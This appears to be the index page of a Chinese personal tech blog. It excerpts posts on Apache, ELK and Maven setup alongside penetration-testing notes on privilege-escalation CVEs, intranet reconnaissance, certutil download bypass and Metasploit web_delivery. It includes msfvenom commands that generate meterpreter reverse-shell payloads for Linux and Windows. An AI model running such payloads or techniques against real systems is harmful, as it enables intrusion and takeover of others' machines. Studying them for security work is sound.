liu_jia_liang的博客

修改/etc/apache2/sites-available/000-default.conf。在/var/www/html 目录里创建目录（每个网站对应一个）DocumentRoot 修改为对应路径。ServerName 修改为对应网站。

在网上搜了许多项目，最后在知乎上看见了一个比较合适的项目。互联网上的一股寒意袭来，现在我们应该为自己添加功德了。把gif图片改一改，我们就可以功德+1了。给自己，给老板，给劳苦大众加功德，阿咪佛。

可能的原因是 Elasticsearch 的证书和主机名不匹配”最近在搭建elk，由于采用的是docker搭建的，中间遇见了很多的大坑，坑的你不要不要的，其中最大的一个大坑就是“es开启https后的问题了”。你可能会在网上搜到很多的解决方案，或者通过chatgpt生成解决方案，但是怎么说呢，这些东西对我来说一无所用。这个问题的原因在于，es默认生成的自签名证书，里面是没有主机名的，索引需要使用openssl生成相应的证书。最终总结，解决方案很简单，但是解决过程，快把我逼疯了。

野路子出身，不明白为什么报错，在网上搜了好久，也没解决，最后问了一位大佬，才发现问题，操作没有问题，可能是jdk的版本太高了，在使用idea学习java的过程中，踩到了一个大坑，在进行maven下载依赖时，一直报错。将jdk版本调低后，maven可以正常下载依赖了。...

我一般喜欢把本地仓库放在和maven同目录下，便于查看和管理，在maven目录下创建repository目录。点击下载（这里我下载的 apache-maven-3.8.6-bin.zip）在setting.xml文件中添加配置，增加本地repository路径即可。三、指定本地repository仓库路径。四、修改conf目录下的setting.然后再path中创建一个新的。一、下载MAVEN(官网)验证maven是否安装成功。七：IDEA配置Maven。新建一个系统环境变量。...

Linux　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to

0x01 漏洞详情３月７日，研究人员公开披露了Linux 内核中的一个权限提升漏洞（CVE-2022-0847，也称为“Dirty Pipe”），允许非特权用户注入和覆盖任意只读文件中的数据，导致权限提升，并最终获得root权限。该漏洞影响了 Linux Kernel 5.8 及更高版本，甚至影响了Android设备。CVE-2022-0847漏洞类似于 2016 年修复的 Dirty COW 漏洞 (CVE-2016-5195)，但它更容易被利用，目前此漏洞的PoC/EXP已经发布。0x0

前言：在msf上生成木马传到目标机器执行上线累死个人，还是一条命令上线比较舒服。目标环境：ubuntu 16.0.41、选择exploit/multi/script/web_delivery模块2、选择目标系统，我这里选择Linux(windows 可以选择PSH pollowshell)linux:windows:3、选择payload，linux:payload/python/shell_reverse_tcpwinodws:...

内网渗透：九、certutil-远程下载绕过目录内网渗透：九、certutil-远程下载绕过一、CertUti使用语法 :windows二、certutil绕过*混淆方式一、CertUtiCertutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。当 certutil 在没有附加参数的证书颁发机构上运行时...

漏洞简介微软在7月20日发布紧急安全公告，公开了一个Windows提权漏洞。由于对多个系统文件（包括安全帐户管理器 (SAM) 数据库）的访问控制列表 (ACL) 过于宽松，攻击者可读取SAM，SYSTEM，SECURITY等文件内容，进而获取用户NTLM Hash值，从而通过解密Hash值或Hash传递等方法造成特权提升漏洞。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。CVE-2021-36934又名 SeriousSam，或现在的 CVE-2021-36934。利用允许您以非管理

简介：2020年8月11号，微软修复了Netlogon 特权提升漏洞，2020年9月11日，安全研究员Secura发布了公告，阐明了漏洞细节，之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”，CVSS评分为10.0，号称3秒撸域控，危害严重。攻击者在通过NetLogon（MS-NRPC）协议与AD域控建立安全通道时，可利用该漏洞将AD域控的计算机账号密码置为空，从而控制域控服务器。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC（remote pr...

一、 漏洞描述Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。CVE-2021-4034polkit 的 pkexec 存在本地权限提升漏洞，已获得普通权限的攻击者可通过此漏洞获取root权限。该漏洞CVSS评分：7.8，危害等级：高危漏洞利用难度低，最早引入问题的 commit 来自 2009 年，影响版本范围远超去年的 sudo 漏洞。漏洞作者在 Ubuntu、Debian、Fedora 和 CentOS

一、sysvol目录 SYSVOL是所有经过身份验证的用户具有读访问权限的Active Directory中的域范围共享。SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上。SYSVOL包含登录脚本，组策略数据以及需要在任何有域控制器的任何地方可用的其他域范围数据(因为SYSVOL在所有域控制器之间自动同步并共享)。所有...

0x01简介2021 年 11 月 9 日，国外研究员在推特上发布了 Active Directory 相关的 CVE，CVE-2021-42278 & CVE-2021-42287 ，两个漏洞组合可导致域内普通用户权限提升至域管权限。0x02 影响0x02范围CVE-2021-42287：Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2...

windows的RDP-hash登录利用在渗透测试中，如果获得了某个用户的NTLM hash，我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录，对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下，如果使用hash远程登录RDP，需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。一：windows RDP-受限管理模式Restricted Admin mode简介官方说明：Restric

一、Kerberos协议kerberos(Secure network authentication system)中文叫网络安全认证系统kerberos在进行认证过程中并不会传输用户的密码，而是通过传输tickets（票据）进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别，其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证（ticket-granting-ticket）访问多个服务，即SSO（Single Sign On）。由于在每个Client和S

内网渗透基础知识[TOC]0x00 内网概述内网也指局域网（Local Area Network，LAN）是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的，它可以由办公室内的两台计算机组成，也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。0x01 内网名词我们在研究内网的时候，经常会听说一些列如“工

一、本机信息收集1.1 查询网络配置信息ipconfig /all1.2查询本机的服务信息wmic service list brief查询系统信息systeminfo查询进程列表tasklist： 查看服务进程IDwmic process list brief： 查看安装程序和版本信息查看计划任务schtasks /query /fo LIST /v 列出计划任务详细信息1查看主机开机时间net statist...

安卓高版本（7.0）之后呢，app可以只信任指定证书和系统内置的证书，后续用户安装的证书是不生效的， 只能想办法装到系统内部。一、首先打开burpsuite导出后缀为cer的https证书，具体的不详述二、ununtu 安装opensslsudo apt-get install opensslsudo apt-get install libssl-dev三、生成系统证书文件：openssl x509 -inform der -subject_hash_old -in bp...

前言在计算机系统中有两种计算机组织方式，分别是工作组和域的方式；局域网上的资源需要管理，“域”和“工作组”就是两种不同的网络资源管理模式。从今天开始学习内网渗透，一天一个进步，一步一个脚印工作组（Work Group）：工作组实行的是分散的管理模式，每一台计算机都是独立的个体。用户账户和权限信息存在本地的计算机中，借助工作组来分享信息；如果有成百上千的计算机，在管理上将会非常的麻烦域（Domain）：域控制器中包含了这个域中所有用户的账户、密码、权限信息、认证方式等；还可以通过域控制器对域中